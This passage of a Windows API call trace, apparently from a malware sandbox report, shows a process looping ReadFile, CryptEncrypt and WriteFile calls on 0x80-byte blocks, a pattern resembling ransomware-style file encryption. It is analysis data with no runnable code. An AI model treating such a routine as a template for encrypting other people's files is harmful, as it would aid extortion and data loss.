lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.838] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.838] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.839] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.839] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.840] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.840] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.841] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.841] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 